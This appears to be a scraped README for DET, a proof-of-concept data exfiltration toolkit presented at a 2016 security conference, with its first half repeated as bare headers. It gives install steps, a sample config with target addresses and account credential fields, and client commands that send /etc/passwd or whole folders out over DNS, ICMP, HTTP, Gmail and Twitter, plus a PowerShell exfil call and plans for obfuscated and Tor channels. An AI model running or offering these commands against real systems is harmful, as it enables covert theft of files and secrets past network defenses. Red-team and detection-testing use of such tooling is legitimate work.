DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service.
Slides
DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here .
Example usage (ICMP plugin)
Server-side:
![]()
Client-side:
![]()
Usage while combining two channels (Gmail/Twitter)
Server-side:
![]()
Client-side:
![]()
Installation
Clone the repo:
Then:
Configuration
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called:
Usage
Help usage
Server-side:
To load every plugin:
To load only twitter and gmail modules:
To load every plugin and exclude DNS:
Client-side:
To load every plugin:
To load only twitter and gmail modules:
To load every plugin and exclude DNS:
And in PowerShell (HTTP module):
Modules
So far, DET supports multiple protocols, listed here:
Experimental modules
So far, I am busy implementing new modules which are almost ready to ship, including:
Roadmap
References
Some pretty cool references/credits to people I got inspired by with their project:
![]()
Slides
DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here .
Example usage (ICMP plugin)
Server-side:
Client-side:
Usage while combining two channels (Gmail/Twitter)
Server-side:
Client-side:
Installation
Clone the repo:
git clone https://github.com/sensepost/DET.gitpip install -r requirements.txt --userConfiguration
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called:
config-sample.json {
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "dataexfil@gmail.com",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}Usage
Help usage
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server modeServer-side:
To load every plugin:
python det.py -L -c ./config.jsonpython det.py -L -c ./config.json -p twitter,gmailpython det.py -L -c ./config.json -e dnsClient-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwdpython det.py -c ./config.json -p twitter,gmail -f /etc/passwdpython det.py -c ./config.json -e dns -f /etc/passwdPS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'Modules
So far, DET supports multiple protocols, listed here:
- HTTP(S)
- ICMP
- DNS
- SMTP/IMAP (eg. Gmail)
- Raw TCP
- PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
- Google Docs (Unauthenticated)
- Twitter (Direct Messages)
Experimental modules
So far, I am busy implementing new modules which are almost ready to ship, including:
- Skype (95% done)
- Tor (80% done)
- Github (30/40% done)
Roadmap
- Add proper encryption (eg. AES-256)
- Compression (extremely important!)
- Proper data obfuscation and integrating Markovobfuscate
- FTP, FlickR LSB Steganography and Youtube modules
References
Some pretty cool references/credits to people I got inspired by with their project:
- https://github.com/nullbind/Powershellery/ from Nullbind.
- https://github.com/ytisf/PyExfil , truely awesome.
- https://github.com/m57/dnsteal from m57.
- https://github.com/3nc0d3r/NaishoDeNusumu from 3nc0d3r.
- https://github.com/glennzw/exphil from Glenn Wilkinson.
- WebExfile from Saif El-Sherei